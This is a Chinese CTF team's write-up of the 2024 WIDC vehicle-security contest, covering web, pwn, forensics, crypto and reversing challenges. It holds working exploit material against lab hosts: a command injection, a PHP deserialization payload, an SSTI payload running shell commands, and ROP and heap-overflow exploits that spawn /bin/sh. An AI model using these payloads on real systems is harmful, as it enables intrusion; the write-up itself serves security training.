2024 WIDC writeup by Arr3stY0u

WriteUp 3周前 admin
84 0 0

HEADER

山海关安全团队是一支专注网络安全的实战型团队,团队成员均来自国内外各大高校与企事业单位,总人数已达50余人。Arr3stY0u(意喻”逮捕你”)战队与W4ntY0u(意喻”通缉你”)预备队隶属于团队CTF组,活跃于各类网络安全比赛,欢迎你的加入哦~

CTF组招新联系QQ2944508194

DAY1

ping出强大:

扫描端口,进入网页,再扫描目录,进入index.php网页,使用burp抓包,换行截断进行命令注入即可得到flag

2024 WIDC writeup by Arr3stY0u

车载通信协议:

使用mqttx工具连接,连接好后输入flag,进入猜大小游戏,再输入666即可得到flag

2024 WIDC writeup by Arr3stY0u

行车记录:

音频查看波形图,将图片水平翻转,即可看到flag

2024 WIDC writeup by Arr3stY0u

哨兵模式:

扫描端口发现8554 RTSP服务

2024 WIDC writeup by Arr3stY0u

尝试使用VLC直接连接播放失败,需要认证。使用https://github.com/Ullaakut/cameradar自带凭证和路由进行爆破,发现:

rtsp://ubnt:[email protected]:8554/live

成功

2024 WIDC writeup by Arr3stY0u

迷失的道路:

考察NMEA GPS定位数据,考虑画图首先根据数据格式补全加$GPGGA,,补全例图如下:

2024 WIDC writeup by Arr3stY0u

然后用脚本生成html文件:

import pynmea2import foliumimport osdef parse_file(file_path):# 定义一个数据预处理的函数    txt_tables = []    f = open(file_path, "r",encoding='utf-8')    line = f.readline() # 读取第一行    locations = []    while line:        text = line[0:]# 从$GPGGA开始读        msg = pynmea2.parse(text)        # print(msg.latitude)  #24.551053333333332        # print(msg.longitude)  #118.1067375        tmp = []        if(msg.latitude == 0.0 or msg.longitude == 0.0):            line = f.readline() # 读取下一行            continue        tmp.append(msg.latitude)        tmp.append(msg.longitude)        locations.append(tmp)        line = f.readline() # 读取下一行    return locationslocations=parse_file("./a.dat")def draw_gps(locations, output_path, file_name):    m = folium.Map(locations[0], zoom_start=15, attr='default')  #中心区域的确定    folium.PolyLine(    # polyline方法为将坐标用线段形式连接起来        locations,    # 将坐标点连接起来        weight=3,  # 线的大小为3        color='orange',  # 线的颜色为橙色        opacity=0.8    # 线的透明度    ).add_to(m)    # 将这条线添加到刚才的区域m内    # 起始点,结束点    folium.Marker(locations[0], popup='<b>Starting Point</b>').add_to(m)    folium.Marker(locations[-1], popup='<b>End Point</b>').add_to(m)    m.save(os.path.join(output_path, file_name))  # 将结果以HTML形式保存到指定路径draw_gps(locations,"./","index.html")#调用

科学上网打开即可看到flag,根据描述提交其md5

2024 WIDC writeup by Arr3stY0u

升级认证平台:

页面根据Edit By PHPSTORM读工程配置文件:
http://172.10.0.17:1221/.idea/workspace.xml 
得到文件结构

file://$PROJECT_DIR$/src/PPlab.phpfile://$PROJECT_DIR$/src/index.phpfile://$PROJECT_DIR$/src/trueflag.php

访问PPlab.php源代码可知简单的反序列化,加一层php filter读base64编码的flag。exp如下:

<?php
class show { public $filename; function printContent() { $content = file_get_contents($this->filename); echo $content; }}
$a = new show();$a->filename = "php://filter/read=convert.base64-encode/resource=trueflag.php";echo serialize($a);
-----------------
POST /PPlab.php HTTP/1.1Host: 172.10.0.17:1221Upgrade-Insecure-Requests: 1User-Agent:ChromeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9X-Forwarded-For: 127.0.0.1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 104
show=O:4:"show":1:{s:8:"filename";s:61:"php://filter/read=convert.base64-encode/resource=trueflag.php";}

不安全的车企内网:

python ssti 注册用户名为payload触发点,无过滤直接根据注册时的提示读文件

user={{ config.__class__.__init__.__globals__['os'].popen('cat ./flag/flag').read() }}&pwd=testyjyj

不安全的TSP平台:

登录处有时间盲注,sqlmap直接跑

2024 WIDC writeup by Arr3stY0u

CyberPhantomLeak-The Ghostly Data Outflow:

发现IPP协议向打印机发送了两个打印任务,从Send Document中提取两个PJL源文件

2024 WIDC writeup by Arr3stY0u

使用ghostpcl将PJL转换为PDF,使用命令分别转换

gs -o xx.pdf -sDEVICE=pdfwrite xx.pjl

flag的两部分:

2024 WIDC writeup by Arr3stY0u

UDS认证:

1.分析CAN报文

2024 WIDC writeup by Arr3stY0u

2.将高亮部分进行hex解码

2024 WIDC writeup by Arr3stY0u

IVIServer:

ROP,exp:

from pwn import *context.log_level='debug'context.binary=ELF('./server')elf=ELF('./server')libc=ELF('./libc-2.31.so')SOCKFD = 4def get(payload):  global p   p = remote('172.10.0.16', 9080)  py=flat({    0:b'GET /',    255: b'r',    0x138:[      payload      ],    },filler=b'x00')  p.send(py+b'rn')rop=ROP(elf)rop.http_response(4,elf.got['write'])get(rop.chain())p.recvuntil(b'</html>nHTTP/1.1')libcbase=u64(p.recvline().strip().ljust(8,b'x00'))- libc.symbols['write']success(hex(libcbase))libc.address=libcbaserop = ROP(libc)rop.dup2(SOCKFD, 0)rop.dup2(SOCKFD, 1)rop.dup2(SOCKFD, 2)rop.system(next(libc.search(b'/bin/sh')))get(rop.chain())p.recvuntil(b'</html>n')p.interactive()

2024 WIDC writeup by Arr3stY0u

嵌入式程序简单逆向:

根据汇编程序逆向出C代码,将题目给的数据使用base64解码作为待解析数据,程序如下:

2024 WIDC writeup by Arr3stY0u

DAY2

vin:

分析CAN流量,高亮处就是vin

2024 WIDC writeup by Arr3stY0u

2024 WIDC writeup by Arr3stY0u

一叶障目:

2024 WIDC writeup by Arr3stY0u

蛛丝马迹:

windows内存取证,发现桌面有个flag.txt

2024 WIDC writeup by Arr3stY0u

车机的图片:

不是正常APK,使用winhex打开取后面base64转图片。根据CRC发现图片有错,尝试爆破宽高,得到flag(根据OCR检测的结果,第二个字母“j”要改为“i”)

2024 WIDC writeup by Arr3stY0u

车辆身份验证:

JEB反编译,一个简单的AES加密:

密文:pbiTIScexzkjzu7byRie4gAyVnzDIlWXdmrm32JX4k9OPzh91SRuzgtgBjN2zbAzYmiP1/Mi0Iplb8vUEC8urUpKk1NOR12fliP/elZ2nXk=key:esa7esa7esa7esa7模式:AES/ECB/ZeroBytePadding

2024 WIDC writeup by Arr3stY0u

OTA升级解密:

OTA升级解密在固件中分析中发现OTA升级相关文件,解密分析.pyc :

补全pyc的头550d0d0a,获得反编译文件

charon@root:~/Desktop/tools/pycdc$ ./pycdc 1.pyc# Source Generated with Decompyle++# File: 1.pyc (Python 3.8)
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modesfrom cryptography.hazmat.primitives import paddingfrom cryptography.hazmat.backends import default_backendimport base64
def encrypt(plaintext, key, iv): cipher = Cipher(algorithms.AES(key), modes.CBC(iv), default_backend(), **('backend',)) padder = padding.PKCS7(128).padder() padded_plaintext = padder.update(plaintext) + padder.finalize() encryptor = cipher.encryptor() ciphertext = encryptor.update(padded_plaintext) + encryptor.finalize() return base64.b64encode(ciphertext).decode()
plaintext = 'flag'ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='key = b'asfdsf141fsad11f'iv = b'MDEyMzQ1Njc4OWFi'ciphertext = encrypt(plaintext.encode(), key, iv)print('密文:', ciphertext)

2024 WIDC writeup by Arr3stY0u

安全驾驶的秘密:

zsteg工具检查LSB可知flag

2024 WIDC writeup by Arr3stY0u

TBOX流量分析:

提取流量包中的压缩包subject.zip

打开压缩包,flag.jpeg末尾有提示 th1s_is_n0t_fla9

压缩包有密码,其中一个flag.txt文件字节大小与提示相近,经过尝试后,在提示后加0x0a成功进行明文攻击。

加密密钥:[ bee257b8 ef831178 486f2557 ]

解开压缩包right.txt即为flag

汽车算法逆向解密:

AES加密

2024 WIDC writeup by Arr3stY0u

车辆身份验证算法:

NTRU加密,直接用格解

# sagefrom Crypto.Util.number import *def GaussLatticeReduction(v1, v2):    while True:        if v2.norm() < v1.norm():            v1, v2 = v2, v1        m = round( v1v2 / v1.norm()^2 )        if m == 0:            return (v1, v2)*        v2 = v2 - m*v1
p = 31133702248881127631782881523509514476295949917122267121183371475000133184586174714396793644108294610935657329746903823657946536256899714076625760275173956706353888064555549064829709009640322743264038620966294636309911212621150898337629208482500384052935025619985047550270255090023343971256783414328092914248587672386617566422965425207785676797600936839556684715022346892107346366574407526099471338642307133437759220537846448437788211849588664491112404963383693116467782205041029098512207782583480993966604998421344660336431260561583879139849901548024253578304205860692342713953570388722937954933289936897205980716117h = 7479856923878243888440888672844723062047571272556529760791388804749830947638106557467887553359594527284215983651237303197361839342245930727075103851252694200077479188468017448449313614412769738144700971711549137789290733004590838892989968103378686521773849802601405707815668581933555308957750986742176692804532749076668670300598708809281336336814136161669355533687195881130337149759522328766625901698480300656083599150462729901168306146171589266181628852056728470683680551973098848836293771016415271912573220080593590309888271888517605697277144430578513191280950815089968643259211353244436267567557456053045262878466c = 429633025508597849623581682941413262998122137449005442145138470065847327103036727404626306379284511549714302199598866480970675273975210441015457022843111558443561825331941415126255871526201864795940071437602555024286559341823246182157480790439813986927891748029716157798569943993538191841077926115352987414280071817801043098050542082078666616788674806002113613279589438740909428444797915581688744647694596536620226032782501572321014769949362774191243994608572057792056353664666429685043726397327996076875440373242053749476708726634285972033216701275507339428064215442465140310384610569381749508378023099179079407328# Construct lattice.v1 = vector(ZZ, [1, h])v2 = vector(ZZ, [0, p])m = matrix([v1,v2]);
# Solve SVP.shortest_vector = m.LLL()[0]# shortest_vector = GaussLatticeReduction(v1, v2)[0]f, g = abs(shortest_vector[0]),abs(shortest_vector[1])print(f, g)
# Decrypt.a = f*c % p % gm = a * inverse_mod(f, g) % gprint('m=',m)print(long_to_bytes(int(m)))

----
104487247500523630173466372012725893519340931300717034092093816350849886822853396168341013290959218180002031254321615523603199349964982692123231600651096747843269073795060299161138930217923899257522072771491233070803811809812208840371872635298833148136787331270890661224119684926154327930512610649281320612648 124543096895293893329367669185601759252473199871894159618224942112012325224062867378866918876501559305963983337570110136768019392332660013395569122436762967931653460895335031144428244801453964870767329929024450393254183082388201674464525220841626637783670034040457808515142474641802222980794941462034685363019m= 67557894833899879721535443738683635889742076553897445643184762026832680586233392404925048827896424102785684459189389647962484b'f2jmf5ld0akrqhxmd7ig3ad22b0eda76e391RQ9tZMH5CBjPthat'

debug算法逆向:

java层,从缓存目录获取密文,然后在native层进行读取密文与输入的加密与验证操作

2024 WIDC writeup by Arr3stY0u

调试java层获取密文路径

/storage/emulated/0/Android/data/com.ctf.read/cache/sec.txt

使用adb shell查看密文得到

jm0g3{djyalj{4og3k1vequwbi:f61:6f;36:;2dkkfAWRjSv2UFDukk

接着是尝试了调试so层,但怎么都断不下来,有点怪

静态分析Java_com_ctf_read_MainActivity_getFlag函数  

bool __fastcall Java_com_ctf_read_MainActivity_getFlag(__int64 a1, __int64 a2, __int64 a3){  const char *v3; // x19  size_t v4; // w20  const char *v5; // x0  __int64 v6; // x8  __int64 v7; // x9  unsigned __int8 *v8; // x11  _BYTE *v9; // x12  __int64 v10; // x17  int v11; // w2  int v12; // w1  int v13; // t1  _BOOL4 v14; // w4  unsigned int v15; // w7  _BOOL4 v16; // w20  _BOOL4 v17; // w10  _BOOL4 v18; // w27  unsigned int v19; // w5  unsigned int v20; // w6  int v21; // w4  char v22; // w10  __int64 v24; // x8  char *v25; // x10  const char *v26; // x9  unsigned int v27; // w15  __int64 v28; // [xsp+8h] [xbp-8h]
v3 = (const char *)_JString2CStr(a1, a3); v4 = strlen(v3); v5 = (const char *)malloc(v4 + 1); v5[v4] = 0; if ( (int)v4 < 1 ) return strcmp(v5, buff) == 0; v6 = v4; if ( v4 < 2uLL ) { v7 = 0LL;LABEL_22: v24 = v6 - v7; v25 = (char *)&v5[v7]; v26 = &v3[v7]; do { v27 = *(unsigned __int8 *)v26; if ( v27 - 48 <= 9 ) { v27 = ((unsigned __int8)(v27 - 45) % 0xAu) | 0x30; } else if ( v27 - 97 > 25 ) { if ( v27 - 65 <= 25 ) v27 = (unsigned __int8)(v27 - 62) % 0x1Au + 65; } else { v27 = (unsigned __int8)(v27 - 94) % 0x1Au + 97; } --v24; ++v26; *v25++ = v27 ^ 3; } while ( v24 ); return strcmp(v5, buff) == 0; } v8 = (unsigned __int8 *)(v3 + 1); v9 = v5 + 1; v28 = v4 & 1; v7 = v4 - v28; v10 = v7; do { v11 = *(v8 - 1); v13 = *v8; v8 += 2; v12 = v13; v14 = (unsigned __int8)(v13 - 58) < 246u; // >0x39 or < 0x30 v15 = v11 - 65; v16 = (unsigned __int8)(v13 - 123) < 230u; v17 = (unsigned int)(v13 - 65) > 0x19; v18 = (unsigned int)(v13 - 65) < 26; v19 = ((unsigned __int8)(v13 - 45) % 0xAu) | 0x30; if ( (unsigned int)(v11 - 97) >= 26 ) // <97 v20 = ((unsigned __int8)(v11 - 45) % 0xAu) | 0x30; else v20 = (unsigned __int8)(v11 - 94) % 26u + 97; v21 = v14 && v16; if ( (unsigned int)(v12 - 97) < 26 ) // 97 <= x <= 122 v19 = (unsigned __int8)(v12 - 94) % 26u + 97; if ( (unsigned __int8)(v11 - 58) < 246u && (unsigned __int8)(v11 - 123) < 230u && v15 < 0x1A ) v20 = (unsigned __int8)(v11 - 62) % 26u + 65; if ( (v21 & v18) != 0 ) v19 = (unsigned __int8)(v12 - 62) % 26u + 65; if ( (unsigned __int8)(v11 - 58) >= 246u || (unsigned __int8)(v11 - 123) >= 230u || v15 <= 0x19 ) LOBYTE(v11) = v20; if ( (v21 & v17) != 0 ) v22 = v12; else v22 = v19; v10 -= 2LL; *(v9 - 1) = v11 ^ 3; *v9 = v22 ^ 3; v9 += 2; } while ( v10 ); if ( v28 ) goto LABEL_22; return strcmp(v5, buff) == 0;}

核心是这一块,这个判断输入的每个字节的大小很迷,为什么会反编译得到这种效果,不太理解

2024 WIDC writeup by Arr3stY0u

其实就输入分为数字,大小写字母,其它字符爆破

#include <stdio.h>
int main(void){ // if ( (unsigned __int8)(47 - 123) < 230 )// printf("33333n"); char enc[] = "jm0g3{djyalj{4og3k1vequwbi:f61:6f;36:;2dkkfAWRjSv2UFDukk";
for(int i = 0; i < 56; i++) { for(int j = 0; j < 0x7f; j++) { unsigned char tmp = j; if(j >= 0x30 && j <= 0x39) tmp = ((unsigned __int8)(j - 45) % 0xA) | 0x30; if(j >= 'A' && j <= 'Z') tmp = (unsigned __int8)(j - 62) % 26 + 65; if(j >= 'a' && j <= 'z') tmp = (unsigned __int8)(j - 94) % 26 + 97; tmp ^= 3; if(tmp == enc[i]) { putchar(j); break; } } }
return 0;}

车机堆溢出利用:

Exp:#coding=utf8from pwn import *context.log_level = 'debug'context.terminal = ['gnome-terminal','-x','bash','-c']local = 0binary_name = 'pwn'if local: cn = process('./'+binary_name)else: cn = remote('172.10.0.19',8888)ru = lambda x : cn.recvuntil(x)sn = lambda x : cn.send(x)rl = lambda : cn.recvline()sl = lambda x : cn.sendline(x)rv = lambda x : cn.recv(x)sa = lambda a,b : cn.sendafter(a,b)sla = lambda a,b : cn.sendlineafter(a,b)bin = ELF('./'+binary_name,checksec=False)def z(a=''): if local: gdb.attach(cn,a) if a == '': raw_input() else: passpush = 0x2A3Dpop = 0xFFFF28add = 0x0sub = 0x11111mul = 0xABCEFdiv = 0x514load = -1save = 0x10101010system_addr = 0x8051c60free_hook = 0x80e09f0def create(d): return " ".join([str(x) for x in d])heap_offset = (0x110-8) // 4code = create([push,push,push,push,load,push,sub,div,save])data = create(["/bin/sh",system_addr,4,heap_offset,free_hook])cn.sendline(code)cn.sendline(data)cn.interactive()

key_of_car:

winhex打开,取出末尾的字符串,rot13

2024 WIDC writeup by Arr3stY0u

车辆流量分析:

192.168.168.28发了好几遍的密钥和flag的base64

2024 WIDC writeup by Arr3stY0u

2024 WIDC writeup by Arr3stY0u

私钥:-----BEGIN ENCRYPTED PRIVATE KEY-----MIIFLTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQIfp6g2gKBuQICAggAMAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBCRTqP45fvUX+BFO9Iq8W/7BIIE0Nfc4n4SbblrA52ukXCOPIZqDSwGgBcAlxjkRJc06Y3kaNMoz4DoOt1hL6GT1d6Th/nfGOEJKJyIz1qfwXiIyKuSGPXmTIukuHZC79jmgUVDd/Tiyg4h4WxJRnAHIeq66M/WLRWbxNqbzMWJ/aU8Vyk/bEgC62I[表情]xE4CUrLjq5mDgF0Mt9J2GBdMBtxONyCtMB4h+m1ik6/hIiBX+MsgUp6PMTYFpK2txbjR0BzR0zXIFuoK2BfDQKKkoJK3+L+6D2Pu69pc4/OmvrULNqNa9XJD1y7ptCAHaHwl/459CnCNoxf5d1GA5RvozHw4Tt6xPz8WQ2vMEucSYCqu4HeW7QBGdzH65IcdpWzDLtsssuSjeROljJL5UplEWwmjL+9y98I42MTFQa4Bhx+MqGEBu8ZMDAePfojwhy1cuhjq2/YcffpWncQnKz96RhIDpLA5SjPwZ7sD5pu0W59ZjtjxVZqqiGW7qph4tg9md8s/oDUjAs+84Wt8171X2GUsI2aiCA7PDzygr+9cmOusNfA+FR4kdC5vuzen0LcqiKHd8btFFeuHF7PGY5pODybGieFRMdK9K1KMMOFp+H5lXXOf5AGJVAvjsgvHKYuGAyfEMtq8KB1BjaOvwaaYY2l6s6E8M1wTt0sjcFaWhxm0sno2/ICmxOOMqm1vY6TRswM0kunSwSXRmaiWcvjyzIBsCRORjbL4qi/NaBfgxaAYZxljcfBNsJz4rvhD3HOm6gai5SNxKj8LFmOuZbJn7WsdbqastuH5lnsjAqqLxqf1N3p3M4qa2b1YimtA9lgBcs2GvChGIr9B6QKJGQdscjfwlDDiIEoHcsMdyhrUPGM024ff+5M+yfhkPRYoOialVp36yBpnGTXMv/FcVc16DBoSxYTmc8hpe68soAOwU2SL2U6VKilO81B2LuVU8EpF56xbfx0oV0Yp+aAYQaOE99WUqRD3f+y2fQbFzrxjD8zwK6gQCR/HV1FUNenyFNmAxNv7k1q9PSj+vDEgGk9b1YG+SfhyXzbsRNR6pPxN75eX/Lohf+fAlb+kOardIjAADFd0575VjoXsklxsYnHY0nrwCZl2url6+qAvfRNcQ+gDa9o83X+k/i1Q8M719KrL7XvhOuks226MFVTnACwFC+ACZVdiW73ab442EhYn4EgVNxIkSxmgonfgqQepftoCtK/ezKpR2+W630CqEl8BGi7s36V6cgBB7dcBLbvi2CGh2nCC0rWmPOOcpryrBxJf1VUhcWsemsHvSG0bIylqMV/POYFSzVVtpaO5kZu5JZbfPNt1FzKSBeSSDwUjUcDrhd+x1u26gVDDiCa2UGRzdu4OQCcOOgkkaQ8QQTPX75BiCMdu+BkhFBlMbPnatxCRsSHKTiHibwOydB7pwnC+ojtiNKwYypJnkuchPD0Ef3oUbiFVgFHnMwn6ivUp4WcspoluNAs6kqobxzKlfdTRJBd/8RJIdmm1MJkIjVHX+E+76B0Y1Rf4q1OJ/SSzHGt0YYXQXliPkWNze6JRA6Ko58t3lAV9JHcAlURkXTDxdSg1BR1zFwqUGLT6HUXBFcpsD/FTh1VX7cFMH/RZcnwIZcPen6orGl5IV4U42D0VoVPNYFUtRNyl2fHtqEIlC4NbA6xUFG-----END ENCRYPTED PRIVATE KEY-----flag:R0CHlZ3TTo8Uj8oymgTGGsG/okvPHP3n/v0CKOE4g0uDqEd4snXAq/kxxUSfEQh8xrGtN6XZB5gJpj+p/96cbECoBoVuhqRO9BxmH63X7cHtv6R3181b0aXuQvSF5uQ1DLgl+nIgKcrhromVryYZYtNWU5Y3BkejWtUL+2tfBRyvB1fGPNZB7OmCALFXpVtb0e5I7x+PlGuPCn1KCCnSS3WwwOLMz6Ftk8p2rEevlmAeMGE3UzjgZO3QVg92X1bXKW0cN+LCOgwkwAx2LJWiHZXzN6dpSoFJ2DETnsQ5BUkQGzkxNQBH6ycelFO/Lx5iHnSBb7bI4dCooGaX0qXx0w==

flag先base64解码,然后使用私钥解密,私钥密码猜测1234时成功

2024 WIDC writeup by Arr3stY0u

私钥解密

2024 WIDC writeup by Arr3stY0u

硬件算法杂逆:

解包给到的img文件,直接尝试解压,得到

2024 WIDC writeup by Arr3stY0u

其中AES_encode是在将py打包的elf文件

2024 WIDC writeup by Arr3stY0u

下载最新版的pyinstxtractor进行解包

https://github.com/extremecoders-re/pyinstxtractor

2024 WIDC writeup by Arr3stY0u

得到

2024 WIDC writeup by Arr3stY0u

对其中的AES_encode.pyc进行反编译,要使用pycdc,后面一部分崩溃了,

2024 WIDC writeup by Arr3stY0u

但能看出加密函数与生成密钥函数,找到之前解包中的密文与iv,根据密文文件,猜测就是进行aes加密

cipflag:b'xebxb1J:}xb6xadSx89x86xabxe7x9bsxd5xebyxf2xdexd2nxf9xa3xa8Gkxb2$BEx03x9fxa1xf7xa9x19x85Sxa8Yxe2Vx98x8dx1eux84xbd`-xcaxd4xc3Em\xd1xa1xf7i6xcbx0cx842txccx94xe6x94xeeAxb4Hxd32hxf5x13K'randomiv:b'xddx92xd2x1axb8xe2<Hxb7xfaNx94xc8x1a$xb3'

再按照密钥生成算法生成密钥

>>> original_hex = 0x3836353635367830>>> original_hex.to_bytes(32, byteorder = 'big')b'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00865656x0'>>> original_hex.to_bytes(32, byteorder = 'big').hex()'0000000000000000000000000000000000000000000000003836353635367830'

2024 WIDC writeup by Arr3stY0u

升级事件:

流量包提取OTA.zip,爆破得压缩包密码为123456。

压缩包中显然为wifi连接握手包,根据提示猜测加爆破可知wifi密码:root12222

使用这个密码继续接解wifi流量找到一个压缩包

2024 WIDC writeup by Arr3stY0u

将连续的4个TCP流量中数据拼接,两次hex编码得到压缩包,弱密码123

2024 WIDC writeup by Arr3stY0u

2024 WIDC writeup by Arr3stY0u

FOOTER

承接CTF培训,代码审计,渗透测试,物联网,车联网、工控设备漏洞挖掘等安全项目,长期收一手bc案源,请联系微信:littlefoursec(备注来由,否则不通过)。

原文始发于微信公众号(山海之关):2024 WIDC writeup by Arr3stY0u

版权声明:admin 发表于 2024年5月26日 下午8:14。
转载请注明:2024 WIDC writeup by Arr3stY0u | CTF导航

相关文章